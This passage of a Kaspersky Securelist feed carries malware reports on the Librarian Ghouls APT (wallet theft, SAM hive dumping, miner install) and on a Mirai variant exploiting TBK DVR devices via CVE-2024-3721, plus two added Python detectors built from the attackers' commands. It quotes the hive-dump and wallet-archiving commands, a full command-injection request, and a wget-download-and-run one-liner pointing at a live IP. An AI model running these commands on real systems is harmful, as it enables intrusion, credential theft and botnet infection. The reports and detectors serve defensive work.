%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup</pre>
<p align="center"><strong><em>Data collection by bat.bat</em></strong></p>
<p>The BAT file uses <code>driver.exe</code> to pack data it has collected into two separate password-protected archives. Then, the script runs <code>blat.exe</code> to send the victim’s data and AnyDesk configuration files to the attackers via SMTP.</p>
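<p>The following added Python example (not Kaspersky's code and not the YARA rule mentioned later in this report) turns the bat.bat stages above, from the AnyDesk password and Defender Control through the wake-to-run task, hive dumps and Blat exfiltration, into command-line detection rules and correlates them per host; the sample events, the 30-minute window and the three-stage threshold are assumptions.</p>

```python
"""Correlate the bat.bat stages described above from command-line telemetry.

Added example, not Kaspersky's code and not the YARA rule mentioned in the
report. Each rule is a regex over the lowercased process command line or
PowerShell script text, modelled on the commands quoted in the article; the
sample events, the 30-minute window and the three-stage threshold are
assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (stage name, pattern over the lowercased command/script text)
RULES = [
    ("anydesk_unattended_password",
     re.compile(r"anydesk\.exe.*--set-password")),
    ("defender_control_disable",
     re.compile(r"\bdc\.exe\s+/d\b")),
    ("powercfg_keep_awake",
     re.compile(r"powercfg\s+(-h\s+off|-change\s+-(standby|hibernate)-timeout-ac\s+0)")),
    ("daily_shutdown_task",
     re.compile(r"schtasks\s+/create.*\bshutdown\b.*/sc\s+daily")),
    ("wake_to_run_task",
     re.compile(r"new-scheduledtasksettingsset.*-waketorun")),
    ("sam_system_hive_dump",
     re.compile(r"reg\s+save\s+hklm\\(sam|system)\b")),
    ("rar_wallet_collection",
     re.compile(r"\.exe\s+a\s+-r\s+.*wallet\.rar")),
    ("blat_smtp_exfil",
     re.compile(r"\bblat\.exe\b")),
]

WINDOW = timedelta(minutes=30)  # assumption: the batch file runs in one sitting
MIN_STAGES = 3                  # assumption: 3 distinct stages per host -> alert


def match_rules(text):
    """Names of every stage whose pattern matches this command or script text."""
    lowered = text.lower()
    return [name for name, pattern in RULES if pattern.search(lowered)]


def correlate(events, window=WINDOW, min_stages=MIN_STAGES):
    """Return {host: sorted stage names} for hosts where at least `min_stages`
    distinct stages fall inside one `window`. A lone hit (an admin running
    'powercfg -h off') never alerts on its own."""
    per_host = defaultdict(list)
    for ev in events:
        for stage in match_rules(ev["text"]):
            per_host[ev["host"]].append((ev["time"], stage))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        best = set()
        for i, (start, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - start <= window}
            if len(stages) > len(best):
                best = stages
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed events (host, time, command line or script block text).
SAMPLE_EVENTS = [
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:02"),
     "text": "echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:03"),
     "text": r"C:\Intel\dc.exe /D"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:04"),
     "text": "powercfg -change -standby-timeout-ac 0"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:05"),
     "text": 'schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00'},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:09"),
     "text": "$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -WakeToRun"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:20"),
     "text": r"C:\Intel\driver.exe a -r -[REDACTED] C:\Intel\wallet.rar C:\wallet.dat /y"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:21"),
     "text": r"reg save hklm\sam C:\Intel\sam.backup"},
    {"host": "WS-01", "time": _ts("2025-05-12 09:14:40"),
     "text": r"C:\Intel\blat.exe -to [REDACTED] -attach C:\Intel\wallet.rar"},
    # Unrelated admin activity on another host: a single stage, no alert.
    {"host": "WS-02", "time": _ts("2025-05-12 10:02:11"),
     "text": "powercfg -h off"},
    {"host": "WS-02", "time": _ts("2025-05-12 10:02:30"),
     "text": r"notepad.exe C:\Users\admin\notes.txt"},
]


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

In a real deployment the `text` field would come from Sysmon Event ID 1 command lines and PowerShell script block logs (Event ID 4104).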
<h4 id="miner-installation-and-self-deletion">Miner installation and self-deletion</h4>
<p>Next, <code>bat.bat</code> deletes the files generated during the attack from the <code>C:\Intel\</code> folder and installs a crypto miner on the compromised system. To do this, the script creates a <code>bm.json</code> configuration file containing the mining pool address and the attackers’ identifier, and then downloads <code>install.exe</code> from <code>hxxp://bmapps[.]org/bmcontrol/win64/Install.exe</code>.</p>
<p><code>install.exe</code> is an installer that checks for the JSON configuration file and the <code>bmcontrol.exe</code> process in the system. If the process is detected, the installer terminates it.</p>
<p>Then, <code>install.exe</code> downloads an archive with mining tools from <code>hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip</code>.</p>
<p>The archive contains the following files:</p>
<ul>
<li><code>_install.exe</code>: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.</li>
<li><code>bmcontrol.exe</code>: miner controller</li>
<li><code>run.exe</code>, <code>stop.cmd</code>, <code>uninstall.cmd</code>: tools for starting, stopping, and removing the controller</li>
<li><a href="https://securelist.com/tag/xmrig/" target="_blank" rel="noopener">XMRig</a> miner</li>
</ul>
<p>Depending on the parameters of the JSON file, the unmodified original installer file is used, or <code>_install.exe</code> is renamed to <code>install.exe</code> and run. After that, the installer adds <code>run.exe</code> to autorun. This utility checks for an already running <code>bmcontrol.exe</code> controller on the compromised system, and if it doesn’t find one, runs it from the downloaded archive.</p>
<p>Once running, <code>bmcontrol.exe</code> creates two processes: <code>master</code> and <code>worker</code>. The <code>master</code> process launches and constantly monitors the <code>worker</code>, and also restarts it if the latter quits unexpectedly. In addition, the <code>master</code> passes the JSON configuration file to the <code>worker</code> process.</p>
<p>Before launching the XMRig miner, the <code>worker</code> process collects the following system information:</p>
<ol>
<li>Available CPU cores</li>
<li>Available RAM</li>
<li>GPU</li>
</ol>
<p>This data is used to configure the miner on the compromised device and also sent to the attackers’ server. While XMRig is running, the <code>worker</code> maintains a connection to the mining pool, sending a request every 60 seconds.</p>
<p>After installing the miner on the system, <code>bat.bat</code> removes itself from the victim’s device.</p>
<h3 id="legitimate-software-utilized-by-the-attackers">Legitimate software utilized by the attackers</h3>
<p>It is a common technique to leverage third-party legitimate software for malicious purposes (<a href="https://attack.mitre.org/techniques/T1588/002/" target="_blank" rel="noopener">T1588.002</a>), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular <a href="https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/" target="_blank" rel="noopener">in the Likho cluster</a>.</p>
<p>Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:</p>
<ul>
<li><a href="http://www.mipko.ru" target="_blank" rel="noopener">Mipko Personal Monitor</a>: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.</li>
<li><a href="https://www.nirsoft.net/utils/web_browser_password.html" target="_blank" rel="noopener">WebBrowserPassView</a>: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims’ credentials.</li>
<li>ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.</li>
<li><a href="https://www.nirsoft.net/utils/nircmd.html" target="_blank" rel="noopener">NirCmd</a>: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.</li>
</ul>
<h3 id="phishing-campaign">Phishing campaign</h3>
<p>Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including <code>users-mail[.]ru</code> and <code>deauthorization[.]online</code>. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the <code>mail.ru</code> email service.</p>
<div id="attachment_116538" style="width: 1053px" class="wp-caption aligncenter"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2.png" alt="Example of a phishing page associated with the APT campaign" width="1043" height="783" /><p id="caption-attachment-116538" class="wp-caption-text">Example of a phishing page associated with the APT campaign</p></div>
<h2 id="infrastructure">Infrastructure</h2>
<p>The implant detailed in this article communicated with the command-and-control servers <code>downdown[.]ru</code> and <code>dragonfires[.]ru</code>. Both resolve to the IP address <a href="https://opentip.kaspersky.com/185.125.51.5/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d2af87f155401802&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">185.125.51[.]5</a>.</p>
<p>Our analysis of the attackers’ infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.</p>
<div id="attachment_116539" style="width: 418px" class="wp-caption aligncenter"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3.png" alt="Directory listing on a malicious server" width="408" height="403" /><p id="caption-attachment-116539" class="wp-caption-text">Directory listing on a malicious server</p></div>
<h2 id="victims">Victims</h2>
<p>Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.</p>
<p>The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.</p>
<h2 id="about-the-attackers">About the attackers</h2>
<p>Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.</p>
<p>Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.</p>
<h2 id="takeaways">Takeaways</h2>
<p>At the time of this report’s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.</p>
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<p><em>* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our <a href="https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting" target="_blank" rel="noopener">APT Intelligence Reporting service</a>. Contact <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a> for more details.</em></p>
<h3 id="implants">Implants</h3>
<h3 id="implant-configuration-files">Implant configuration files</h3>
<h3 id="malicious-archive-attachments">Malicious archive attachments</h3>
<h3 id="malicious-bat-files">Malicious BAT files</h3>
<h3 id="decoy-documents">Decoy documents</h3>
<h3 id="malicious-ps1-scripts">Malicious PS1 scripts</h3>
<p><strong>Miner installer (install.exe)</strong></p>
<p><strong>Miner controller (bmcontrol.exe)</strong></p>
<p><strong>Miner launcher (run.exe)</strong></p>
<h3 id="legitimate-software">Legitimate software</h3>
<p><strong>AnyDesk</strong><br />
<strong>Blat</strong><br />
<strong>curl</strong><br />
<strong>Defender Control</strong><br />
<strong>Customized RAR 3.80</strong><br />
<strong>Mipko Personal Monitor</strong><br />
<strong>ngrok</strong><br />
<strong>NirCmd</strong><br />
<strong>4t Tray Minimizer</strong><br />
<strong>WebBrowserPassView</strong></p>
<h3 id="librarian-ghouls-malicious-domains">Librarian Ghouls malicious domains</h3>
<p>
<a href="https://opentip.kaspersky.com/bmapps.org/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d0d3426800d0cc6e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">bmapps[.]org</a></p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721</title>
<link>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/</link>
<comments>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/#respond</comments>
<dc:creator><![CDATA[Anderson Leite]]></dc:creator>
<pubDate>Fri, 06 Jun 2025 10:00:38 +0000</pubDate>
<category><![CDATA[GReAT research]]></category>
<category><![CDATA[Botnets]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Linux]]></category>
<category><![CDATA[Data Encryption]]></category>
<category><![CDATA[Vulnerabilities]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Internet of Things]]></category>
<category><![CDATA[Mirai]]></category>
<category><![CDATA[Honeypot]]></category>
<category><![CDATA[CVE]]></category>
<category><![CDATA[RC4]]></category>
<category><![CDATA[Vulnerabilities and exploits]]></category>
<category><![CDATA[Secure environment (IoT)]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116742</guid>
<description><![CDATA[Kaspersky GReAT experts describe the new features of a Mirai variant: the latest botnet infections target TBK DVR devices with CVE-2024-3721.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.</p>
<p>We recently observed the use of <a href="https://www.cve.org/CVERecord?id=CVE-2024-3721" target="_blank" rel="noopener">CVE-2024-3721</a> in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous <a href="https://securelist.com/tag/mirai/" target="_blank" rel="noopener">Mirai botnet</a>, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras; they are widely used, produced by many manufacturers, and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.</p>
<h2 id="exploitation">Exploitation</h2>
<p>During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to <a href="https://github.com/netsecfish/tbk_dvr_command_injection" target="_blank" rel="noopener">CVE-2024-3721</a>. This vulnerability allows system commands to be executed on TBK DVR devices without proper authorization, giving the attacker an entry point via a specific POST request:</p>
<pre class="urvanov-syntax-highlighter-plain-tag">"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"</pre>
<p>The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.</p><pre class="urvanov-syntax-highlighter-plain-tag">cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk</pre><p>
Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.</p>
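<p>As an added example (not code from the article or from Kaspersky), the following Python scans HTTP access-log lines for the request pattern described above and decodes the injected <code>mdc</code> parameter, so that honeypot or DVR logs can be checked for CVE-2024-3721 attempts. The log lines are constructed; the first reproduces the request quoted above, the other two are benign.</p>

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request-line portion of a combined-format access log entry.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Markers taken from the request quoted in the article: the vulnerable
# handler and the magic "cmd" value the exploit sends.
VULN_PATH = "/device.rsp"
MAGIC_CMD = "___S_O_S_T_R_E_A_MAX___"

# Download-and-execute primitives typically chained in the injected command.
SUSPICIOUS_TOKENS = ("wget", "curl", "tftp", "chmod", "/tmp")

# Constructed sample log (client IPs and timestamps are made up). The first
# entry reproduces the request shown in the article; the others are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jun/2025:09:12:01 +0000] "POST /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20'
    'wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20'
    '.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"',
    '10.0.0.7 - - [06/Jun/2025:09:13:44 +0000] "GET /device.rsp?opt=sys'
    '&cmd=get_time HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Jun/2025:09:14:10 +0000] "GET /index.html HTTP/1.1"'
    ' 200 5120 "-" "Mozilla/5.0"',
]


def parse_request(line):
    """Return (method, path, query dict, status) for a log line, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes the values, which is what reveals the command.
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return m.group("method"), parts.path, query, int(m.group("status"))


def classify(line):
    """Describe one log line: is it a CVE-2024-3721 attempt, and what did it inject?"""
    parsed = parse_request(line)
    if parsed is None:
        return {"exploit": False, "reason": "unparsable request line"}
    method, path, query, status = parsed
    if path != VULN_PATH or query.get("opt") != "sys":
        return {"exploit": False, "reason": "not a device.rsp sys request"}
    injected = query.get("mdc", "")
    magic = query.get("cmd") == MAGIC_CMD
    if not injected:
        # Legitimate management calls use the handler without an mdc payload.
        return {"exploit": False, "reason": "no mdc parameter", "magic_cmd": magic}
    tokens = [t for t in SUSPICIOUS_TOKENS if t in injected]
    # The payload is a ';'-separated shell one-liner; split it into steps.
    steps = [s.strip() for s in injected.split(";") if s.strip()]
    urls = re.findall(r"https?://[^\s;]+", injected)
    return {
        "exploit": magic or bool(tokens),
        "method": method,
        "status": status,       # a 200 alone does not prove the command ran
        "magic_cmd": magic,
        "command": injected,
        "steps": steps,
        "urls": urls,           # payload hosts worth blocking and hunting for
        "tokens": tokens,
    }


def scan(lines):
    """Return (index, verdict) pairs for the lines classified as exploit attempts."""
    verdicts = ((i, classify(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in verdicts if v["exploit"]]


if __name__ == "__main__":
    for i, v in scan(SAMPLE_LOG):
        print(f"line {i}: CVE-2024-3721 attempt, {v['method']} -> HTTP {v['status']}")
        for step in v["steps"]:
            print("    step:", step)
        print("    payload URLs:", ", ".join(v["urls"]))
```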
<h2 id="malware-implant-mirai-variant">Malware implant – Mirai variant</h2>
<p>The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.</p>
<p>The DVR bot is also based on the Mirai source code, but it adds features of its own, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai <a href="https://securelist.com/tag/mirai/" target="_blank" rel="noopener">in many posts</a>, so we’ll focus on the new features of this specific variant.</p>
<h3 id="data-decryption">Data decryption</h3>
<p>The data decryption routine in this variant is implemented as a simple RC4 algorithm.</p>
<p>The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: <code>6e7976666525a97639777d2d7f303177</code>.</p>
<p>The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom <code>DataDecrypted</code> structure, which is a simple string list:</p>
<div id="attachment_116743" style="width: 648px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116743" class="size-full wp-image-116743" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png" alt="Data decryption routine" width="638" height="313" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png 638w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1-571x280.png 571w" sizes="auto, (max-width: 638px) 100vw, 638px" /></a><p id="caption-attachment-116743" class="wp-caption-text">Data decryption routine</p></div>
<p>The global linked list with decrypted data is accessed whenever the malware needs particular strings.</p>
<div id="attachment_116744" style="width: 432px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116744" class="size-full wp-image-116744" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png" alt="Adding decrypted strings to the global list" width="422" height="137" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png 422w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2-300x97.png 300w" sizes="auto, (max-width: 422px) 100vw, 422px" /></a><p id="caption-attachment-116744" class="wp-caption-text">Adding decrypted strings to the global list</p></div>
<h3 id="anti-vm-and-anti-emulation">Anti-VM and anti-emulation</h3>
<p>To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the <code>/proc</code> directory, which is the proc filesystem on Linux.</p>
<p>Each process ID (PID) has its own folder containing useful information, such as <code>cmdline</code>, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with <code>VMware</code> or <code>QEMU-arm</code> in their command line.</p>
<div id="attachment_116745" style="width: 938px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116745" class="size-full wp-image-116745" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png" alt="Process check" width="928" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png 928w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-300x126.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-768x324.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-831x350.png 831w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-740x312.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-665x280.png 665w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-800x337.png 800w" sizes="auto, (max-width: 928px) 100vw, 928px" /></a><p id="caption-attachment-116745" class="wp-caption-text">Process check</p></div>
<p>The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:</p>
<div id="attachment_116746" style="width: 584px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116746" class="size-full wp-image-116746" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png" alt="Allowed directories" width="574" height="406" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-300x212.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-495x350.png 495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-396x280.png 396w" sizes="auto, (max-width: 574px) 100vw, 574px" /></a><p id="caption-attachment-116746" class="wp-caption-text">Allowed directories</p></div>
<p>Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.</p>
<h2 id="infection-statistics">Infection statistics</h2>
<p>According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.</p>
<p>The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.</p>
<p>All Kaspersky products detect the threat as <code>HEUR:Backdoor.Linux.Mirai</code> and <code>HEUR:Backdoor.Linux.Gafgyt</code>.</p>
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<p><strong>Host-based (MD5 hashes)</strong><br />
<strong>IPs</strong><br />
</p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>IT threat evolution in Q1 2025. Non-mobile statistics</title>
<link>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/</link>
<comments>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/#respond</comments>
<dc:creator><![CDATA[AMR]]></dc:creator>
<pubDate>Thu, 05 Jun 2025 10:00:25 +0000</pubDate>
<category><![CDATA[Malware reports]]></category>
<category><![CDATA[Microsoft Windows]]></category>
<category><![CDATA[Adware]]></category>
<category><![CDATA[Malware Statistics]]></category>
<category><![CDATA[Apple MacOS]]></category>
<category><![CDATA[Ransomware]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Trojan]]></category>
<category><![CDATA[Internet of Things]]></category>
<category><![CDATA[Honeypot]]></category>
